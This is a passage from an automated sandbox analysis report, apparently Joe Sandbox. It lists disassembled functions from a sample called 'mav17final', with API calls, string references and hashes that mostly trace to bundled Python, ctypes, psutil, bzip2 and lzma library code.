                                                  • String ID:
                                                  • API String ID: 1903735390-0
                                                  • Opcode ID: a7a767094c4d1de27d1ae5cfedc4f2a8987a46609b88e723d83c121dba346a55
                                                  • Instruction ID: 8c02c90a3d58d396218045a86b2e477b010846db4d7c03cb25fb2e9fa593eb21
                                                  • Opcode Fuzzy Hash: a7a767094c4d1de27d1ae5cfedc4f2a8987a46609b88e723d83c121dba346a55
                                                  • Instruction Fuzzy Hash: 9821E532F0DAC385FF6A8F79985933822A4AF65B99F148035DB0E86384DF2DA544C300
                                                  Function 00007FF8B9F6D8F8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$Arg_FormatNumber_OccurredSsize_tTupleUnpack
                                                  • String ID: byref$byref() argument must be a ctypes instance, not '%s'
                                                  • API String ID: 169608245-1446499295
                                                  • Opcode ID: 1c7a6bb527df66017d67d4d6c8e7051229e04b236d9d6aec440ba77389511a69
                                                  • Instruction ID: 1dccd19e82b89bf7f819875eec7ce89047d76e2fc829b3e890e7189f8bd56728
                                                  • Opcode Fuzzy Hash: 1c7a6bb527df66017d67d4d6c8e7051229e04b236d9d6aec440ba77389511a69
                                                  • Instruction Fuzzy Hash: 88212766A08B8682EB108F69E85027967A0FF89BF6F140635DB6D87390DF7DE504C350
                                                  Function 00007FF8B9F6B96C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PyDict_GetItemWithError.PYTHON311(?,?,00000001,00007FF8B9F677AC), ref: 00007FF8B9F6B9AD
                                                  • PyErr_Occurred.PYTHON311(?,?,00000001,00007FF8B9F677AC), ref: 00007FF8B9F6B9BC
                                                  • PyErr_Format.PYTHON311(?,?,00000001,00007FF8B9F677AC), ref: 00007FF8B9F6B9ED
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$Dict_ErrorFormatItemOccurredWith
                                                  • String ID: not enough arguments$required argument '%S' missing
                                                  • API String ID: 62204369-3448764933
                                                  • Opcode ID: 28da8afa7e9ef03481714140949b522f70dd2a78d8c2b5e7d138b51459312286
                                                  • Instruction ID: 15e9b5ab0632677eb4fa654150ff42268616c0bdc329b552a6f14c34d143e03b
                                                  • Opcode Fuzzy Hash: 28da8afa7e9ef03481714140949b522f70dd2a78d8c2b5e7d138b51459312286
                                                  • Instruction Fuzzy Hash: 5D110771A0EFC281EA958F6AE9841396770AF46FE7F18A531DB4E46758EF2CE441C300
                                                  Function 00007FF8B9F6EB34 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CharErr_FormatUnicode_Wide
                                                  • String ID: string too long (%zd, maximum length %zd)$unicode string expected instead of %s instance
                                                  • API String ID: 2195588020-2061977717
                                                  • Opcode ID: 3df54ba06c241b92dbf221aa78cdec5a2b91a3063c00f8d20a6361d5b8dc2ae5
                                                  • Instruction ID: 55801199342ebc13c32ba8a0a6b078f3934f3e2c246d570bb32950c5c23c8c37
                                                  • Opcode Fuzzy Hash: 3df54ba06c241b92dbf221aa78cdec5a2b91a3063c00f8d20a6361d5b8dc2ae5
                                                  • Instruction Fuzzy Hash: D3115422B08FC681EA808F1AE9841656B62BF89FF5F185631DF1E53BA4DE3CD455C700
                                                  Function 00007FF8B9074E80 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: fprintf
                                                  • String ID: GetActiveProcessorCount() not available; using GetSystemInfo()$psutil-debug [%s:%d]> $psutil/arch/windows/cpu.c
                                                  • API String ID: 383729395-586088648
                                                  • Opcode ID: 0c310fc330f00f858f022fddad38e9cf6f8bfcfbc167ac525e5c94752c09e3f8
                                                  • Instruction ID: f0fe25ef0f68e0830ec9d893b14bf354c74d303a6bfb3baf72105cfee20fb15c
                                                  • Opcode Fuzzy Hash: 0c310fc330f00f858f022fddad38e9cf6f8bfcfbc167ac525e5c94752c09e3f8
                                                  • Instruction Fuzzy Hash: 7011DB24F0968691FE449F6DE8952B53BA1AF647E1F408436C70E073A6DE2CE587C311
                                                  Function 00007FF8B90CC748 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • bzip2/libbzip2: internal error number %d.This is a bug in bzip2/libbzip2, %s.Please report it to: bzip2-devel@sourceware.org. If this happenedwhen you were using some program which uses libbzip2 as acomponent, you should also report this bug to the auth, xrefs: 00007FF8B90CC768
                                                  • *** A special note about internal error number 1007 ***Experience suggests that a common cause of i.e. 1007is unreliable memory or other hardware. The 1007 assertionjust happens to cross-check the results of huge numbers ofmemory reads/writes, and so ac, xrefs: 00007FF8B90CC78A
                                                  • 1.0.8, 13-Jul-2019, xrefs: 00007FF8B90CC75B
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: __acrt_iob_func$__stdio_common_vfprintfexit
                                                  • String ID: bzip2/libbzip2: internal error number %d.This is a bug in bzip2/libbzip2, %s.Please report it to: bzip2-devel@sourceware.org. If this happenedwhen you were using some program which uses libbzip2 as acomponent, you should also report this bug to the auth$*** A special note about internal error number 1007 ***Experience suggests that a common cause of i.e. 1007is unreliable memory or other hardware. The 1007 assertionjust happens to cross-check the results of huge numbers ofmemory reads/writes, and so ac$1.0.8, 13-Jul-2019
                                                  • API String ID: 77255540-989448446
                                                  • Opcode ID: 39f94f7b81e53d96969a5455d7e6e9458db4137e20d4da26f7d9a91deb3b3694
                                                  • Instruction ID: 8c043494b1ff9618496f83f1ebee6789cde1ba9520ee647c3960bc87c745ee95
                                                  • Opcode Fuzzy Hash: 39f94f7b81e53d96969a5455d7e6e9458db4137e20d4da26f7d9a91deb3b3694
                                                  • Instruction Fuzzy Hash: F8E06D24A1859662FE185FADE8953B81375EF547C0F000939CB0E076A1DE2CE95F8352
                                                  Function 00007FF8B90C2CF8 Relevance: 9.1, APIs: 6, Instructions: 116threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocEval_Thread$Bytes_FromList_RestoreSaveSizeString
                                                  • String ID:
                                                  • API String ID: 722544280-0
                                                  • Opcode ID: ea514226ac897717a144e055f78113507add513ccc51a98260a4e0d553d29f9f
                                                  • Instruction ID: da5b4fc874dd0ac4221cbe86cab4ebf7fecddf55f3db00b74af0cc498de95241
                                                  • Opcode Fuzzy Hash: ea514226ac897717a144e055f78113507add513ccc51a98260a4e0d553d29f9f
                                                  • Instruction Fuzzy Hash: 31415A32A08B8296EE649F2DA54423963B0BB58BE0F140235DF5D43BD1EF3CE49AC300
                                                  Function 00007FF8BA246570 Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
                                                  • String ID:
                                                  • API String ID: 3741236498-0
                                                  • Opcode ID: de3a4ec1d6e9946eef6b348e6d8a6ead344041b39e9dfd9c2ce66c677152b10d
                                                  • Instruction ID: 6f126f34958843b1520b117ca211632991ee96ca62a46273cdf62000a80fe118
                                                  • Opcode Fuzzy Hash: de3a4ec1d6e9946eef6b348e6d8a6ead344041b39e9dfd9c2ce66c677152b10d
                                                  • Instruction Fuzzy Hash: 8B31B322B19B9290FF15DF2AA9145696394FF08FD4B5986B5DF2D03784EE3DE442D300
                                                  Function 00007FF8B9F6C050 Relevance: 9.1, APIs: 6, Instructions: 79COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocDict_$CallErr_FormatFromItemLong_MakeObject_Unicode_Voidstrchr
                                                  • String ID:
                                                  • API String ID: 4054517332-0
                                                  • Opcode ID: 183dbe4e66a78b5f82bf9fcbdc5b815f8fe5dd19242b5949e3bcf8ed559180f2
                                                  • Instruction ID: b0c6f64ac8d0e9461baf4af98baf7143259c753ef1a5c68d243ecf28999ee53a
                                                  • Opcode Fuzzy Hash: 183dbe4e66a78b5f82bf9fcbdc5b815f8fe5dd19242b5949e3bcf8ed559180f2
                                                  • Instruction Fuzzy Hash: 40310921A0AB8282FE549F2EE95003967A1AF4AFE6F486534DF9E47795DF3CE451C300
                                                  Function 00007FF8B9F637B0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 257COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocErr_StringSubtypeType_
                                                  • String ID: has no _stginfo_
                                                  • API String ID: 402260271-2912685656
                                                  • Opcode ID: 9230919844186ca5f41c7b1a63fcb82edb38cf4c596bbf94e99535158fbb2ad0
                                                  • Instruction ID: bc1d6ce833dc43fe0e7ac2b68f55a8d83e6a5cf54676973e01d1c967a62a3931
                                                  • Opcode Fuzzy Hash: 9230919844186ca5f41c7b1a63fcb82edb38cf4c596bbf94e99535158fbb2ad0
                                                  • Instruction Fuzzy Hash: 16B15972A09BC682EA64CF29E85027977A5FB84BE6F14A439DB4E43754DF7CE850C700
                                                  Function 00007FF8BA243AEC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 189COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: abort$CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 2889003569-2084237596
                                                  • Opcode ID: bc23f9d190e68b0d649da4772cf0aebac2cf99f7a7c8ea39b120ae49b64f19ea
                                                  • Instruction ID: ade5e5fcb86ee154f5f2958263cfb57ea4a2976895dbb15d6a7ab3f61892fbe2
                                                  • Opcode Fuzzy Hash: bc23f9d190e68b0d649da4772cf0aebac2cf99f7a7c8ea39b120ae49b64f19ea
                                                  • Instruction Fuzzy Hash: B5917073A08B928AE711CB69E4402ED7BA1FB44BC8F14416AEF8D17B55DF38D195DB00
                                                  Function 00007FF8BA24BF20 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 167COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+
                                                  • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                  • API String ID: 2943138195-757766384
                                                  • Opcode ID: e51d893b916fd38dc1e020bc8963aa6f83aa847b46c3d095f24d6897074767ca
                                                  • Instruction ID: d48cadacfa7880ebae3d63c0199cf3d2adb9e3253aedef77145171d008f827d7
                                                  • Opcode Fuzzy Hash: e51d893b916fd38dc1e020bc8963aa6f83aa847b46c3d095f24d6897074767ca
                                                  • Instruction Fuzzy Hash: 93716676A08A4394EB148F2CD9410BC67A4BF09BC4F4445B5EF4E42BA8DF3DE660E700
                                                  Function 00007FF8BA2438D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 146COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: abort$CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 2889003569-2084237596
                                                  • Opcode ID: 227e5baf7e5e9155f58c31c3fecc157e2e687fbe3eaaf077a93d355b17988fc2
                                                  • Instruction ID: 348b0d2826ea75d295b350942f276162fbf624c2ddda49361be8c50bb254f82f
                                                  • Opcode Fuzzy Hash: 227e5baf7e5e9155f58c31c3fecc157e2e687fbe3eaaf077a93d355b17988fc2
                                                  • Instruction Fuzzy Hash: E6612732A08B868AE724CF69E5803AD77A0FB44B88F144266EF4D17B99CF78E155D700
                                                  Function 00007FF8B90C3A90 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 114COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: combined CRCs: stored = 0x%08x, computed = 0x%08x$ {0x%08x, 0x%08x}
                                                  • API String ID: 0-2474432645
                                                  • Opcode ID: 69a7ee2d0339cf96717ad35ba872c5bfcdb46555bf6c34d719e37fdf827b1516
                                                  • Instruction ID: 3e54cf4388ba3c9e2c64af98e28fb7dc8e9c3611db04f7d8366ed7189b838ecc
                                                  • Opcode Fuzzy Hash: 69a7ee2d0339cf96717ad35ba872c5bfcdb46555bf6c34d719e37fdf827b1516
                                                  • Instruction Fuzzy Hash: 2E414A32A1C6C387EF649F2994802B873B1EB44B94F144635EB1E966C5CF28E88FC710
                                                  Function 00007FF8B9F624A0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PyMem_Malloc.PYTHON311(?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,00007FF8B9F63784), ref: 00007FF8B9F624ED
                                                  • PyMem_Free.PYTHON311(?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,00007FF8B9F63784), ref: 00007FF8B9F625DB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Mem_$FreeMalloc
                                                  • String ID: %zd)$%zd,
                                                  • API String ID: 3308143561-2233965340
                                                  • Opcode ID: 97bbcc1d359357e3c252192984d3b0109526b27b564f2bbea6cf16545a3b7b27
                                                  • Instruction ID: a6ab5640e86abd259accb64fcaa642bcdc10b67826e497fa7a1fecc294f496e7
                                                  • Opcode Fuzzy Hash: 97bbcc1d359357e3c252192984d3b0109526b27b564f2bbea6cf16545a3b7b27
                                                  • Instruction Fuzzy Hash: C741B122A09BC281EF118F19E4502B96BA0FB59BE5F882132DF5D97795DF3DE445C310
                                                  Function 00007FF8B9075F88 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 89COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeviceQueryswprintf_s
                                                  • String ID: %c:$:$Z
                                                  • API String ID: 914998285-434247157
                                                  • Opcode ID: 5affc6d7e9673fba9a69e782a228053b50d5b8f6e27cd9141442bcbbdf8abcd8
                                                  • Instruction ID: 1db275049f1184acf5816499c6c4a9fe460b4b9b091c175fcb91a9281462ddfe
                                                  • Opcode Fuzzy Hash: 5affc6d7e9673fba9a69e782a228053b50d5b8f6e27cd9141442bcbbdf8abcd8
                                                  • Instruction Fuzzy Hash: B531E662A1D6C241EF628F28A8513FA2F60AFE17D4F844036C78E42696DE2CD50AC711
                                                  Function 00007FF8B909FE00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PySequence_Size.PYTHON311(00000000,00007FF8A8D96CC8,00000000,00007FF8B909FDB0), ref: 00007FF8B909FE28
                                                  • PySequence_GetItem.PYTHON311 ref: 00007FF8B909FE5B
                                                    • Part of subcall function 00007FF8B909FEE4: PyMapping_Check.PYTHON311(?,?,?,?,?,?,?,00007FF8B909FE77), ref: 00007FF8B909FF09
                                                    • Part of subcall function 00007FF8B909FEE4: PyMapping_GetItemString.PYTHON311(?,?,?,?,?,?,?,00007FF8B909FE77), ref: 00007FF8B909FF23
                                                    • Part of subcall function 00007FF8B909FEE4: PyLong_AsUnsignedLongLong.PYTHON311(?,?,?,?,?,?,?,00007FF8B909FE77), ref: 00007FF8B909FF38
                                                    • Part of subcall function 00007FF8B909FEE4: PyErr_Occurred.PYTHON311(?,?,?,?,?,?,?,00007FF8B909FE77), ref: 00007FF8B909FF4B
                                                  • PyErr_Format.PYTHON311 ref: 00007FF8B90A5761
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072699078.00007FF8B9091000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8B9090000, based on PE: true
                                                  • Associated: 00000002.00000002.2072666393.00007FF8B9090000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072745005.00007FF8B90A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072745005.00007FF8B90AC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072810626.00007FF8B90B4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072844987.00007FF8B90B5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9090000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_ItemLongMapping_Sequence_$CheckFormatLong_OccurredSizeStringUnsigned
                                                  • String ID: Too many filters - liblzma supports a maximum of %d
                                                  • API String ID: 1062705235-2617632755
                                                  • Opcode ID: de739252f705775659eaa313a5e663d0679b8c2fa46ad5978c51ae0de71ab62c
                                                  • Instruction ID: 570fad99c99339aebb98286e04b93dbbc570498d8cb0fc11c575d2d7e9d13bf1
                                                  • Opcode Fuzzy Hash: de739252f705775659eaa313a5e663d0679b8c2fa46ad5978c51ae0de71ab62c
                                                  • Instruction Fuzzy Hash: 5D217461A18AC2C5EE649F6EA94417A6251BF49BF4F240735DF7E067E6DE3CE8834300
                                                  Function 00007FF8B9F6A3C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$FormatInstanceObject_String
                                                  • String ID: Pointer does not support item deletion$expected %s instead of %s
                                                  • API String ID: 341772743-2046472288
                                                  • Opcode ID: 56d4fabad618d8a5c8e6f1fde8dcb41e7996936431b442245916351dcbdf5c73
